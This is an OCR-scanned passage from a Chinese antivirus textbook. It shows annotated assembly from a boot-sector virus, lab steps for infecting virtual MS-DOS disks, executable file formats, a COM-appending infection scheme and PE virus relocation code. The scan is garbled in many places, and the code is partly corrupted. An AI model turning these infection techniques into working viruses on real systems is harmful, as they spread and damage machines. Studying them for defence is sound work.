

mov cl,06h 
shl ax,cl ;ax = 8F80 
add ax, 0840h ;ax =97c0 
mov es,ax 
mov si,7c00h ;si = 7c00 
mov di, si 
mov cx, 0100h 
repz movsw ; // 将 病毒 移 到 高 端 
V2: push ax 
pop ds 
push ax 
mov bx, 7c4bh 
push bx 
ret ; // 指 令 执 行 转 入 高 端 内 存 
call v3 
v3: xor ah,ah ;ah=0 
int 13h 
mov ah, 80h 
and byte ptr ds:[7df8h],al 
v4: mov bx, word ptr ds:[7df9h] ; // 读 入 病毒 的 其 他 部 分 
push cs 
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pop ax ; ax= 97c0 
sub ax, 20h ; ax= 97a0 
mov es,ax ; es = 97a0 
call v9 
mov bx, word ptr ds:[7df9h] ;load logic sector id 
inc bx ;bx++is boot sector 
mov ax, OffcOh ;ffc0:8000 = 0000:7c00 // 读 入 原 引 导 分 区 内 容 
ImOV es,ax 
call v9 
xor ax,ax ;AX=0 
mov byte ptr ds:[7df7h],al ;flag = 0 
v5: mov ds,ax ;ds= 0 
mov ax, word ptr ds:[4ch] 
mov bx, word ptr ds:[4eh] ; // 修 改 中 断 向 量 
mov word ptr ds:[4ch],7cd6h 
mov word ptr ds:[4eh], cs ;now int13h had been changed 
push cs 
pop ds ;ds = cs 
mov word ptr ds:[7d30h], ax ;save original int13 vector 
mov word ptr ds:[7d32h], bx 
v6: mov dl, byte ptr ds:[7df8h] ;load drive letter 
v7: jmp 0000:7C00 


db 0eah, 00h, 7ch, 00h, 00h ; // 这 里 是 个 跳 转 指 令 的 二 进 制 代码 
(4) 读 入 原 主 引导 分 区 , 转 去 执行 操作 系统 的 引导 工作 。 这 部 分 工作 可 以 参照 硬盘 引 
3.1.2 引导 型 病毒 实验 
【实验 目的 】 


通过 实验 ,了 解 引导 区 病毒 的 感染 对 象 和 感染 特征 ,重点 学 习 引 导 病 毒 的 感染 机 制 和 恢 
复 感染 病毒 文件 的 方法 ,提高 汇编 语言 的 使 用 能 力 。 

【实验 内 容 】 

本 实验 需要 完成 的 内 容 如 下 。 

(1) 引导 阶段 病毒 由 软盘 感染 硬盘 实验 。 通 过 触发 病毒 ,观察 病毒 发 作 的 现象 和 步骤 
学 习 病 毒 的 感染 机 制 ; 阅读 和 分 析 病 毒 的 代码 。 

(2) DOS 运行 时 病毒 由 硬盘 感染 软盘 的 实现 。 通 过 触发 病毒 ,观察 病毒 发 作 的 现象 和 
步骤 学 习 病 毒 的 感染 机 制 ; 阅读 和 分 析 病 毒 的 代码 。 

【实验 环境 】 

(1) VMWare Workstation5. 5. 3。 

《2) MS-DOS 7. 10。 

【实验 素材 】 

本 书 配 套 素材 experiment 目录 下 的 bootvirus 目录 。 

【实验 步骤 】 

第 一 步 : 环境 安装 。 

安装 虚拟 机 VMWare, 在 虚拟 机 环境 内 安装 MS-DOS 7. 10。 安 装 步骤 参考 本 书 配套 素材 。 
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a 


第 二 步 : 软盘 感染 硬盘 。 


(1) 运行 虚拟 机 ,检查 目前 虚拟 硬盘 是 否 含有 病毒 。 图 3-1 所 示 为 没有 病毒 正常 启动 
硬盘 的 状态 。 


Btarting MS-DOS ?.1... 


elcome to MS-D0S 7.19... 
opyright Microsoft Corp. h11 rights reserved . 


iller v1.0 Copyright 1995 Vincent Penquerc’h. All Rights Reserved. 
Killer installed in memory. 
和 osSKEY installea . 
pOSLFN 9.32zo: loaded consuming 11849 bytes. 
BHARE v7 .19 (Revision 4.11.1492) 
i (c) 1989-2993 Datalight, Inc. 


v1.9.1 [D0S] 
Imstalled at PS/2 port 


ow you are in MS-DOS ?.19 prompt. Tupe ’HELP’ for help. 


i 


图 3-1 没有 病毒 正常 启动 硬盘 的 状态 


(2) 在 本 书 配套 
(3) 将 含有 病毒 
示 。 按 任意 键 进入 区 


材 中 复制 含有 病毒 的 虚拟 软盘 virus. img。 
软盘 插入 虚拟 机 引导 ,可 以 看 到 闪 动 的 字符 ”x*^“x*”, 如 图 
3-3 所 示 的 画面 


图 3-2 出 现 字符 图 3-3 ”病毒 画面 


感染 


第 三 步 : 验证 硬盘 已 经 
(1) 取出 虚拟 软盘 ,通过 硬盘 引导 ,再 次 出 现 了 病毒 的 画面 (图 3-4)。 


图 3-4 再 次 出 现 病 毒 画面 
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(2) 按 任意 键 后 正常 引导 了 DOS 系统 (图 3-5) 。 可 见 ,硬盘 已 经 被 感染 。 


Starting MS-DOS 7.1... 


elcome to MS-DOS 7.19... 
opyright Microsoft Corp. All rights reserved. 


killer v1.9 Copyright 1995 Uincent Penquerc’h. All Rights Reserved. 
lkiller installed in memory. 
[DOSKEY installed. 
IDOSLFN 6.320: loaded consuming 11849 bytes. 
TO .19 (CRevision 4.11.1492) 
(c) 1989-2993 Datalight, Inc. 


v1.9.1 [DOS] 
at PS/2 port 


ow you are in MS-DOS 7.19 prompt. Type ’HELP’ for help. 


由 


Epp 


3-5 硬盘 已 被 感染 


第 四 步 : 硬盘 感染 软盘 
(1) 下 载 empty. img ,并 且 将 它 插 入 虚拟 机 ,启动 计算 机 ,由 于 该 盘 为 空 , 如 图 3-6 所 示 。 


图 3-6 ”软盘 为 空 时 的 显示 界面 


(2) 取出 虚拟 软盘 ,从 硬盘 启动 ,通过 命令 format A: /q 快速 格式 化 软盘 。 可 能 提示 出 
错 , 这 时 只 要 按 R 键 即 可 ,如 图 3-7 所 示 。 

(3) 成 功 格式 化 后 的 结果 如 图 3-8 所 示 

(4) 不 要 取出 虚拟 软盘 .重新 启动 虚拟 机 ,这 时 是 从 empty. img 引导 ,可 以 看 到 病毒 的 
画面 ,如 图 3-9 所 示 。 按 任意 键 进入 如 图 3-10 所 示 的 画面 。 可 见 , 病 毒 已 经 成 功 由 硬盘 传 
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:N?format A:/q 
Insert new diskette for drive A: 
and press ENTER when ready... 


hecking existing disk format . 
Invalid existing format. 

his disk cannot be QuickFormatted . 
Proceed with Unconditional Format (Y/N)?y 
下 ormatting 1.44H 

Format complete . 


General failure reading drive 有 
Abort, Retry, Fail?_ 


3-7 格式 化 软盘 


his disk cannot be QuickFormatted. 
Proceed with Unconditional Format (Y/N)?y 
下 ormatting 1.44MH 
Format complete. 


General failure reading drive fl 
bort, Retry, Fail?r 


olume label (11 characters, ENTER for none)? 


General failure reading drive f 
Abort, Retry, Fail?r 


1,924 bytes total disk space 
1,924 bytes available on disk 


512 bytes in each allocation unit. 
2 allocation units available on disk. 


olume Serial Number is 9h74-1415 


QuickFormat another (Y/N)?n 


图 3-8 格式 化 后 的 效果 


图 3-9 病毒 画面 图 3-10 病毒 由 硬盘 传染 给 了 软盘 
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3.2 16 位 可 执行 文件 病毒 编制 技术 


3.2.1 16 位 可 执行 文件 结构 及 运行 原理 


文件 型 病毒 是 病毒 中 的 大 家 族 , 顾 名 思 义 ,该 病毒 主要 是 感染 文件 (包括 COM 、EXE、 
DRV、BIN、OVL 和 SYS 等 扩展 名 的 文件 )。 当 它们 激活 时 ,感染 文件 又 把 自身 复制 到 其 他 
干净 文件 中 ,并 能 在 存储 介质 中 保存 很 长 时 间 , 直 到 病毒 又 被 激活 。 由 于 技术 的 原因 ,文件 
型 病毒 的 活力 远 比 引导 型 病毒 强 。 目 前 存在 着 数 千 种 文件 型 病毒 ,它们 不 但 活动 在 DOS 16 
位 环境 中 ,而 且 在 Windows 32 位 系统 中 依然 非常 活跃 ,同时 ,有 些 文件 型 病毒 能 很 成 功 地 
感染 OS2、Linux、UNIX 和 Macintosh 环境 中 的 文件 。 编 制 文件 型 病毒 的 关键 是 分 析 操 作 
系统 中 的 文件 结构 及 其 执行 原理 。 本 节 主 要 介绍 16 位 系统 中 常见 的 文件 结构 及 其 运行 原 
理 ,为 后 续 章 节 做 准备 。 

1. COM 格式 

最 简单 的 可 执行 文件 就 是 DOS 下 的 COM 文件 。 由 于 当时 计算 机 64KB 内 存 的 限制 ， 
就 产生 了 COM 文件 。COM 格式 文件 最 大 为 64KB, 内 含 16 位 程序 的 二 进 制 代码 映像 , 没 
有 重 定位 信息 。COM 文件 包含 程序 二 进 制 代码 的 一 个 绝对 映像 ,也 就 是 说 ,为 了 运行 程序 
准确 的 处 理 器 指令 和 内 存 中 的 数据 ,DOS 通过 直接 把 该 映像 从 文件 复制 到 内 存 来 加 载 
COM 程序 ,系统 不 需要 做 重 定位 工作 。 

为 加 载 一 个 COM 程序 ,DOS 试图 分 配 内 存 , 因 为 COM 程序 必须 位 于 一 个 64KB 的 段 
中 ,所 以 COM 文件 的 大 小 不 能 超过 65 024B(64KB 减 去 用 于 PSP 的 256B 和 用 于 一 个 起 始 
堆栈 的 至 少 256B) 。 如 果 DOS 不 能 为 程序 .一 个 PSP(Program Segment Prefix, 程序 段 前 
组 ) 和 一 个 起 始 堆栈 分 配 足 够 内 存 , 则 分 配 尝试 失败 。 和 否则 ,DOS 分 配 尽 可 能 多 的 内 存 ( 直 
至 所 有 保留 内 存 ) ,即使 COM 程序 本 身 不 能 大 于 64KB。 在 试图 运行 男 一 个 程序 或 分 配 另 
外 的 内 存 之 前 ,大 部 分 COM 程序 释放 任何 不 需要 的 内 存 。 分 配 内 存 后 ,DOS 在 该 内 存 的 头 
256B 建立 一 个 PSP。 结 构 如 表 3-1 所 示 。 


表 3-1 COM 格式 的 结构 及 说 明 


偏 移 大 小 长 度 /Byte 说 明 
0000h 2 中 断 20H 
0002h 六 以 字 节 计算 的 内 存 大 小 (利用 该 项 可 看 出 是 否 感染 引导 型 病毒 ) 
0004h 下 保留 
0005h 5 至 DOS 的 长 调用 
000Ah 2 INT 22H 入 口 卫 
000Ch 2 INT 22H 入 口 CS 
000Eh 2 INT 23H 和 A 口 人 PP 
0010h 2 INT 23H 入 口 CS 
0012h 2 INT 24H 入 口 卫 
0014h 2 INT 24H 入 口 CS 
0016h 2 父 进程 的 PSP 段 值 (可 测 知 是 否 被 跟踪 ) 
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续 表 

偏 移 大 小 长 度 /Byte 说 有 明 

0018h 14 存放 20 个 SOFT 号 

002Ch 2 环境 块 段 地 址 (从 中 可 获知 执行 的 程序 名 ) 

002Eh 4 存放 用 户 栈 地 址 指针 

0032h 1E 保留 

0050h 3 DOS 调 用 (INT 21H/RETF) 

0053h 2 保留 

0055h 7 扩展 的 FCB 头 

005Ch 10 格式 化 的 FCB1 

006Ch 10 格式 化 的 FCB2 

007Ch 4 保留 

0080h 80 命令 行 参数 长 度 

0081h 127 命令 行 参数 


如 果 PSP 中 的 第 一 个 FCB 含有 一 个 有 效 驱 动 器 标识 符 , 则 置 AL 为 00H, 和 否则 为 
OFFH。DOS 还 置 AH 为 00H 或 OFFH ,这 依赖 于 第 二 个 FCB 是 否 含有 一 个 有 效 驱动 器 标 
识 符 。 创 建 PSP 后 ,DOS 在 PSP 后 立即 开始 ( 偏 移 100H) 加 载 COM 文件 , 它 置 SS.DS 和 
ES 为 PSP 的 段 地址 ,接着 创建 一 个 堆栈 。 为 了 创建 这 个 堆栈 ,DOS 置 SP 为 0000H。 如 果 
没有 分 配 64KB 内 存 , 则 要 求 置 寄存 器 大 小 是 所 分 配 的 字 节 总 数 加 2 的 值 。 最 后 , 它 把 
0000H 推进 栈 中 ,这 是 为 了 保证 与 早期 DOS 版 本 上 设计 的 程序 的 兼容 性 。 

DOS 通过 控制 传递 偏 移 100H 处 的 指令 而 启动 程序 。 程 序 设 计 者 必须 保证 COM 文件 
的 第 一 条 指令 是 程序 的 入口 点 。 因 为 程序 是 在 偏 移 100H 处 加 载 ,所 以 所 有 代码 和 数据 偏 
移 也 必须 相对 于 100H。 汇 编 语言 程序 设计 者 可 通过 设置 程序 的 初 值 为 100H 保证 这 一 点 
(例如 ,通过 在 源 代码 的 开始 使 用 语句 org 100H) 。 

2. MZ 格式 

COM 发 展 下 去 就 是 MZ 格式 的 可 执行 文件 ,这 是 DOS 中 具有 重 定位 功能 的 可 执行 
文件 格式 。MZ 可 执行 文件 内 含 16 位 代码 ,在 这 些 代码 之 前 加 了 一 个 文件 头 ,文件 头 中 
包括 各 种 说 明 数 据 , 例 如 ,第 一 句 可 执行 代码 执行 指令 时 所 需要 的 文件 入 口 点 、 堆 栈 的 位 
置 、. 重 定位 表 等 。 操 作 系统 根 据 文件 头 的 信息 将 代码 部 分 装 和 内存, 然后 根据 重 定 位 表 
修正 代码 ,最 后 在 设置 好 堆栈 后 从 文件 头 中 指定 的 入 口 开始 执行 。 因 此 DOS 可 以 把 MZ 
格式 的 程序 放 在 任何 它 想 要 的 地 方 。 图 3-11 所 示 为 MZ 格式 的 可 执行 文件 的 简单 结构 
示意 图 。 


MZ 标志 

其 他 信息 MZ 文件 头 
重 定位 表 的 字 节 偏 移 量 

重 定位 表 重 定位 表 
可 重 定 位 程序 映像 二 进 制 代 码 


3-11 MZ 格式 文件 结构 示意 图 
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// 双 格 式 可 执行 程序 文件 头 
struct HeadEXE 
{ 
WORD wType; // 00H MZ 标志 
WORD wLastSecSize; // 02H 最 后 扇 区 被 使 用 的 大 小 
WORD wFileSize; // 048 文件 大 小 
WORD wRelocNum; // 06H 重 定位 项 数 
WORD wHeadSize; // 08H 文件 头 大 小 
WORD wReqMin; // oaH 最 小 所 需 内 存 
WORD wReqMax; // oCH 最 大 所 需 内 存 
WORD wInitSS; // 0EH SS 初 值 
WORD wInitSP; // 10H SP 初 值 
WORD wChkSum; // 128 校 验 和 
WORD wInitIP; // 14H IP 初 值 
WORD wInitCS; // 16H CS 初 值 
WORD wFirstReloc; // 18H 第 一 个 重 定位 项 位 置 
WORD wOverlap; // 1aH 覆盖 
WORD wReserved[ 0x20]; // 1CH 保 留 
WORD wNEOff set; // 3CH NE 头 位置 
}; 
3. NE 格式 


为 了 保持 对 DOS 的 兼容 性 并 满足 Windows 的 需要 , Windows 3. x 中 出 现 的 NE 格式 


的 可 执行 文件 中 保留 了 MZ 格式 的 头 , 同 时 NE 文件 又 加 了 一 个 自己 的 头 , 之 后 才 是 可 执行 


文人 


F 的 可 执行 代码 。NE 类 型 包括 了 EXE、DLL、DRV 和 FON 4 种 类 型 的 文件 。NE 格式 


的 关键 特性 是 它 把 程序 代码 ,数据 及 资源 隔离 在 不 同 的 可 加 载 区 中 , 借 由 符号 输入 和 输出 ， 
实现 所 谓 的 运行 时 动态 链接 。 图 3-12 所 示 为 NE 格式 的 可 执行 文件 的 结构 示意 图 。 


MS-DOS 头 
保留 区 域 
Windows 头 偏 移 
DOS Stub 程序 
信息 块 


DOS 文件 头 


NE 文件 头 


模块 引用 表 
引入 名 字 表 

入 口 表 
非 驻 留 名 表 
代码 段 和 数据 段 
重 定位 表 


程序 区 


3-12 NE 格式 文件 结构 示意 图 


16 位 的 NE 格式 文件 装载 程序 (NE Loader) 读 取 部 分 磁盘 文件 ,并 生成 一 个 完全 不 同 


的 数据 结构 ,在 内 存 中 建立 模块 。 当 代码 或 数据 需要 装 和 人 时 ,装载 程序 必须 从 全 局 内 存 中 分 
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配 出 一 块 , 查 找 原 始 数据 在 文件 中 的 位 置 ,找到 位 置 后 再 读 取 原 始 的 数据 ,最 后 再 进行 一 些 
修正 。 另 外 ,每 一 个 16 位 的 模块 (Module) 要 负责 记 住 现在 使 用 的 所 有 段 选择 符 , 该 选择 符 
表示 该 段 是 否 已 经 被 抛弃 等 信息 。 


// NE 格式 可 执行 文件 文件 头 
struct HeadNE 
{ 
WORD wType; // 亚 标志 
BYTE wLinkerVerMajor; 
BYTE wLinkerVerMinor; 
WORD wEntryOffset; 
WORD wEntrySize; 
DWORD dReserved; 
WORD wModelFlag; 
WORD wDGROUPseg; 
WORD wInitLocalHeapSize; 
WORD wInitStackSize; 
WORD wInitIP; 
WORD wInitCS; 
WORD wInitSP; 
WORD wInitSS; 
WORD wSegTableEntrys; 
WORD wModelRefEntrys; 
WORD wNoResdNameTableSize; 
WORD wSegTableOffset; 
WORD wResourceOffset; 
WORD wResdNameTableOffset; 
WORD wModelRefOffset; 
WORD wInputNameTableOffset; 
DWORD wNoResdNameTableOffset; 
WORD wMovableEntrys; 
WORD wSegStartOffset; 
WORD wResTableEntrys; 
BYTE bOperatingSystem; 


BYTE bExtFlag; 

WORD wELAOffsetBySector; // 快 速 装 入 区 ,Windows 专用 
WORD wFLASectors; //Windows 专用 

WORD wReserved; 

WORD wReqWindowsVer; //Windows 专用 


3.2.2 COM 文件 病毒 原理 


COM 文件 是 一 种 单 段 执行 结构 的 文件 ,其 执行 文件 代码 和 执行 时 内 存 映 像 完全 相同 ,起 始 
执行 偏 移 地 址 为 100H, 对 应 于 文件 的 偏 移 00H( 文 件 头 )。 感 染 COM 文件 的 典型 做 法 如 下 。 


cs:0100 jmp endoffile //db 0E9H,，0100H 处 为 文件 的 开头 
//dw CoM 文件 的 实际 大 小 
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endoffile: 
virusstart: // 病 毒 代 码 开始 
mov ax, orgcode //orgcode db 3 dup(?) 


// 源 文件 由 0100 开始 的 3 个 字 节 


mov [100], ax 
mov al, [orgcode + 2] 
mov [102], al 
virussize = $ 一 virusstart 
resume: 
jmp 100 //db 0E9H 
//dw 当前 地 址 - (COM 文件 的 实际 大 小 + 病毒 代码 大 小 ) 


病毒 要 感染 COM 文件 , 先 将 开始 的 3 个 字 节 保存 在 orgcode 中 ,并 将 这 3 个 字 节 更 改 
为 0E9H 和 COM 文件 的 实际 大 小 的 二 进 制 编码 。 然 后 ,将 resume 开始 的 3 个 字 节 改 为 
0E9H 和 表达 式 ( 当 前 地 址 -COM 文件 的 实际 大 小 十 病毒 代码 大 小 ) 的 二 进 制 编码 ,以 便 在 
执行 完 病毒 后 转向 执行 源 程 序 。 最 后 ,将 病毒 写 入 源 COM 文件 的 末尾 。 

此 外 ,完整 的 病毒 感染 代码 还 需要 感染 标记 判断 、 文 件 大 小 判断 等 。 


3.2.3 COM 文件 病毒 实验 


【实验 目的 】 
掌握 COM 病毒 的 传播 原理 。 
【实验 环境 】 


(1) VMWare Workstation 5.5.3。 

(2) MS-DOS 7. 10。 

(3) MASM611 。 

【实验 步 又】 

(1) 安装 虚拟 机 VMWare, 安装 步骤 参考 网 上 下 载 的 实验 配套 资料 * 解 压缩 目录 \ 
Application\MSDOS71\ 虚 拟 机 上 安装 MSDOS. doc" 文 档 。 

(2) 在 虚拟 机 环境 内 安装 MS-DOS 7. 10。 

(3) 在 MS-DOS C: AMASM 目录 下 安装 MASM611 ,然后 将 binr 目录 下 的 link. exe 复 
制 到 bin 目录 下 。 

(4) 从 本 书 配套 素材 experiment\com 下 复制 病毒 程序 Virus. asm 及 测试 程序 源 代码 
Belnfected. asm。 

如 果 直 接 在 本 书 配套 素材 中 获得 了 虚拟 机 映像 文件 ,可 以 直接 装载 这 个 虚拟 机 文件 。 
装载 了 这 个 虚拟 机 文件 后 ,实验 环境 就 已 经 完整 ,实际 需要 的 两 个 代码 也 能 够 在 相关 目录 中 
找到 了 (图 3-13)。 

1. 编译 程序 

编译 链接 test. asm ,形成 test. com 测试 程序 。 

编译 链接 virus. asm, 生 成 病毒 程序 virus. exe。 

两 个 程序 的 编译 过 程 完 全 相同 .在 此 以 编译 virus. asm 为 例 , 详 细 过 程 如 下 。 

(1) masm virus. com。 输 入 该 语句 .可 以 生成 virus. obj。 具 体 如 图 3-14 所 示 。 


苦 9 言 
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oo 
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EXE 78， 87“B9“1992 2p QH.EXE 

IC0 ,886 81/16/1992 QH.IC0 

COM 83/18/1992 3: MOUSE. COM 
EXE 81/21/1992 5: UNDEL. EXE 
DLL ,692 87/16/1992 TLD1LOC. DLL 
DLL 87717/1992 2a TLHBLOC. DLL 
DLL 人 83/18/1992 18: TOOLHELP. DLI 
EXE 3,877 87/14/1992 HX. EXE 

EXE 四 87/1471992 HXSRUR. EXE 
386 i 86/28/1992 UMB. 386 
BAT 5 89/14/2887 11: NEH-UARS. BAT 
SYS 2 89/14/2887 11: NEN-CONF .SYS 
OBJ 83711/2818 12: UIRUS. OBJ 
RSHM 83/2172888 2p test.asm 
08BJ 72 83/13/2889 TEST. 0BJ 
COM 83/22/2818 TEST. COM 
COM 56 83/22/2818 UIRUS. COM 
OBJ 89/12/2818 18: BOOT. OBJ 
ASM E 83/15/2888 9: UIRUS.RSH 
ASM 89712/2818 18: boot .ash 
COM 32,773 89/12/2818 18: BOOT. COM 
82 file(s) 5,414,578 byte: 

2 dir(s) 523, 198,272 byte 


C:NMASM611NBIN>_ 


司 区 欧陆 
3-13 ”代码 已 存在 于 相关 目录 中 


MS-DOS - VMware Workstation 
| Ele Edt Vew VM Ieam Windows Help 
| 到 mW 四 | 机 国政 || 回 加 | 口 | 加 


869“1472887 NEH-CONF. 
83/11/2818 UIRUS. OBJ 
83/21/2888 2 test.as™ 
83/13/2889 11: TEST. OBJ 
83/22/2818 3:24p TEST.COM 
83/22/2818 3: UIRUS. COM 
89/12/2818 18: BOOT. OBJ 
83715/2888 9 UIRUS.ASM 
89/12/2818 18 boot .asn 
89/12/2818 18: BOOT.COM 
82 file(s) 5,414,578 bytes 
2 dir(s) 523, 198,272 bytes free 


MHRSHM611\BIN>hasn_ virus ,asn 

Microsoft (R) MASM Compatibility Driver 

Copyright (C) Microsoft Corp 1993. AI1l rights reserved. 
Invoking: ML.EXE /1. /2m /c /Ta virus.asm 


Macro Assembler Uersion 6.11 
(C) Microsoft Corp 1981-1993. AIl rights reserved. 


Rssenbling: virus.asm 


IC:NMASM611NBIN>_ 


3-14 ”生成 virus. obj 

(2) link viurs. obj。 输 入 该 指令 ,生成 virus. com。 在 默认 情况 下 ,会 生成 virus. exe, 可 
以 在 link 过 程 中 把 名 称 改 为 com, 如 图 3-15 所 示 

(3) 检查 文件 。 检 查 当 前 目录 下 是 否 生成 了 virus. com。 如 果 存 在 则 已 经 正确 编译 。 
以 同样 的 步骤 生成 test. com。 

2. 实验 步骤 

(1) 实验 准备 。 在 C: \MASM\Bin 目录 下 建 3 


del. txt 文件 ,并 且 将 test. com 和 病毒 
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-olx| 


加 || 了 丙丁 号 | 古 


IC:\MASMB11NBIN>1ink virus.obj 
Harning: running program in real mode: CPU already in protected or virtual mode 


IMicrosoft (R) Segmented Executable Linker Ver: 5.31.889 Jul 13 1992 
Copyright (C) Microsoft Corp 1984-1992. AI1l rights reserved. 
Run File [virus.exe]: virus.con 

[nul. map]: 

[.1lib]: 


LINK : fatal error L1893: virus,obj : object file not found 


IC:\MASMG11NBIN>_ 


3-15 ”生成 virus. com 


virus. com 复制 到 此 目录 下 
(2) 感染 前 的 运行 情况 。 执 行 test. com 观察 未 4 


行 结果 , 如 图 3-16 所 示 。 


M Mware Workstation 可 -lolxl 
| Ele Edt View WM Ieam Windows Help 
ET Wl[a] 
3 


C:\MASM611\BIN>test. 


e{ 41L=t HThis a simple com program for a test 


C:NMASMB11NBIN>_ 


ET 
图 3-16 未 感染 前 的 运行 情况 


(3) 运行 病毒 。 执 行 virus. com 文件 以 感染 test. com 文件 并 且 自 动 删除 del. txt, 如 
图 3-17 所 示 。 

(4) 观察 感染 后 的 效果 。 执 行 test. com 观察 
两 部 分 组 成 ,首先 显示 了 病毒 代码 的 一 部 分 工作 , 然 
所 示 。 

【程序 源码 】 

本 实验 以 尾部 感染 COM 文件 的 病毒 为 例子 , 其 中 待 感染 COM 文件 源 代码 
BeInfected. asm、 病 毒 源 文件 源 代码 virus. asm 参见 本 书 配 套 素材 。 


的 年 网 区 test. com 运行 过 程 由 
局 和 了 自身 的 原 有 功能 ,如 图 3-18 
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bz) 


MS-DOS - VMware Workstation 


| Ble Edt Vew YM Ieam Windows Help 
证 咬 || 因 回回 


GD™so0s 
EXE B172171992 5:55p UNDEL. EXE 
DLL 4 B87/16/1992 TLD1LOC. DLL 
DLL : 87/17/1992 TLNBLOC .DLL 
DLL B83/18/1992 TOOLHELP. DL 
87/14/1992 HX. EXE 
B87/14/1992 11:51p HXSRUR. EXE 
86/28/1992 11:49p VMB.386 
NEN-URRS . BAT 
NEN-CONF . SYS 
test .asM 
18“12“2818 TEST.0BJ 
18/12/2818 4:99p TEST.COM 
B83/22/2818 了 UIRUS. COM 
89/12/2818 18:38p BOOT.OBJ 
83/15/2888 9:12p VIRUS.ASM 
89/12/2818 18:38p boot.asm 
89/12/2818 18:39p BOOT.COM 
81 file(s) 5,413,814 bytes 
2 dir(s) 523,198,464 bytes free 


IC :\MASM611\BIN>virus. com 
infected by a simple com virus 
Incorrect opcode. Rilling process. 


三 区 加 网 
图 3-17 运行 病毒 


| Ele Edit Ye WM Team Windows Hep 
Jm 了 | 2 号 | 大 日 百 
BD Ms-Dos 

IC :NMASM611\BIN>test.com 


ou are infected by a sinple com virus 
a | 


L=! HThis a simple com program 


IC:\MASMG11NBIN>_ 


图 3-18 感染 后 的 效果 


3.3 32 位 可 执行 文件 病毒 编制 技术 


学 习 本 节 前 ,建议 学 习 并 掌握 PE 可 执行 文件 的 结构 及 运行 原理 。 推 荐 参考 罗 云 彬 4 
著 的 (Windows 环境 下 32 位 汇编 语言 程序 设计 (第 2 版 ) 。 

尽管 基于 16 位 架构 的 病毒 依然 存在 ,尽管 有 些 病毒 创作 者 还 沉浸 在 获得 16 位 架构 特 
权 的 喜悦 中 ,但 32 位 架构 .64 位 架构 才 代 表 当 今 潮流 。 古 语 云 :“ 知 已 知 彼 , 百 战 不 殖 ”。 尽 
管 本 书 的 目的 是 计算 机 病毒 防范 技术 ,但 学 习 并 精通 32 位 操作 系统 下 的 病毒 制作 理论 是 当 
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今 病毒 防范 的 重要 基础 。 
3.3.1 PE 文件 结构 及 其 运行 原理 


PE(Portable Executable, 可 移植 的 执行 体 ) 是 Win32 环境 自身 所 带 的 可 执行 文件 格 
式 。 它 的 一 些 特性 继承 自 UNIX 的 COFF(Common Object File Format) 文件 格式 。 可 移 
植 的 执行 体 意味 着 此 文件 格式 是 跨 Win32 平台 的 ,即使 Windows 运行 在 非 Intel 的 CPU 
上 ,任何 Win32 平台 的 PE 装载 器 都 能 识别 和 使 用 该 文件 格式 。 当 然 , 移 植 到 不 同 的 CPU 
上 PE 执行 体 必 然 得 有 一 些 改 变 。 除 VxD 和 16 位 的 DLL 外 ,所 有 Win32 执行 文件 都 使 用 
PE 文件 格式 。 因 此 ,研究 PE 文件 格式 是 我 们 洞悉 Windows 结构 的 良机 。 


3.3.2 PE 文件 型 病毒 关键 技术 


在 Win32 下 编写 Ring3 级 别 的 病毒 不 是 一 件 非 常 困 难 的 事情 ,但 是 ,在 Win32 下 的 系 
统 功能 调用 不 是 直接 通过 中 断 来 实现 的 ,而 是 通过 DLL 导出 的 。 因 此 ,在 病毒 中 得 到 API 
入 口 是 一 项 关键 任务 。 虽 然 ,Ring3 给 我 们 带 来 了 很 多 不 方便 的 限制 ,但 这 个 级 别 的 病毒 有 
很 好 的 兼容 性 ,能 同时 适用 于 Windows 9x 和 Windows 2000 环境 。 编 写 Ring3 级 病毒 ,有 
几 个 重要 问题 需要 解决 。 

1. 病毒 的 重 定位 

我 们 写 正常 程序 的 时 候 根 本 不 用 去 关心 变量 (常量 ) 的 位 置 ,因为 源 程序 在 编译 的 时 候 
在 内 存 中 的 位 置 都 被 计算 好 了 。 程 序 装 入 内 存 时 ,系统 不 会 为 它 重 定位 。 编 程 时 需要 用 到 
变量 (常量 ) 的 时 候 直 接 用 它们 的 名 称 访问 (编译 后 就 是 通过 偏 移 地 址 访问 ) 即 可 。 

病毒 不 可 避免 地 也 要 用 到 变量 (常量 ) , 当 病 毒 感染 宿主 程序 后 ,由 于 其 依附 到 宿主 程序 
中 的 位 置 各 有 不 同 , 它 随 着 宿主 程序 载 人 内存 后 ,病毒 中 的 各 个 变量 (常量 ) 在 内 存 中 的 位 置 
自然 也 会 随 之 改变 。 如 果 病 毒 直接 引用 变量 就 不 再 准确 ,势必 导致 病毒 无 法 正常 运行 。 因 
此 ,病毒 必须 对 所 有 病毒 代码 中 的 变量 进行 重新 定位 。 病 毒 重 定位 代码 如 下 。 


call delta 
delta:pop ebp 


lea eax, [ebp + (offset varl ~ offset delta) ] 


当 pop 语句 执行 完 之 后 ,ebp 中 存放 的 是 病毒 程序 中 标号 delta 在 内 存 中 的 真正 地 址 。 
如 果 病 毒 程序 中 有 一 个 变量 varl, 那 么 该 变量 实际 在 内 存 中 的 地 址 应 该 是 ebp 十 (offset 
varl-offset delta) 。 由 此 可 知 ,参照 量 delta 在 内 存 中 的 地 址 加 上 变量 varl 与 参考 量 之 间 的 
距离 就 等 于 变量 varl 在 内 存 中 的 真正 地 址 。 

接 下 来 ,用 一 个 简单 的 例子 来 说 明 这 个 问题 。 假 设 有 一 段 简单 的 汇编 代码 : 


dwVar dd 和 
call @F 
@@ 
pop ebx 


sub ebx, offset @B 
mov eax, [ebx+ offset dwVar] 
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执行 这 段 代码 后 ,eax 存放 的 就 是 dwVar 的 运行 时 刻 的 地 址 。 如 果 还 不 好 理解 ,可 以 
假设 这 段 代 码 在 编译 运行 时 有 一 个 固定 起 始 装载 地 址 (这 有 点 像 DOS 时 代 的 COM 文件 ) 。 
不 失 一 般 性 ,可 以 令 这 个 固定 起 始 装载 地 址 为 00401000H。 这 段 代码 编译 后 的 可 执行 代码 
在 内 存 中 的 映像 为 : 


00401000 00000000 BYTE 4 DUP(4) 
00401004 E800000000 call 00401009 
00401009 5B pop ebx //ebx = 00401009 


0040100A 81EB09104000 sub ebx, 00401009 //ebx = 0 

00401010 8B8300104000 mov eax, dword prt [ebx + 00401000] 
// 最 后 一 句 相 当 于 
//mov eax, dword prt [00401000] 
// 或 mov eax, dwVar 


如 果 理 解 了 这 个 固定 起 始 地 址 的 装载 过 程 ,动态 的 装载 就 很 容易 理解 了 。 接 下 来 ,假设 
将 可 执行 程序 动态 地 加 载 到 内 存 中 。 


00801000 00000000 BYTE 4 DUP(4) 
00801004 E800000000 call 00801009 
00801009 5B pop ebx //ebx = 00801009 


0080100A 81EB09104000 subebx, 00401009  //ebx = 00400000 
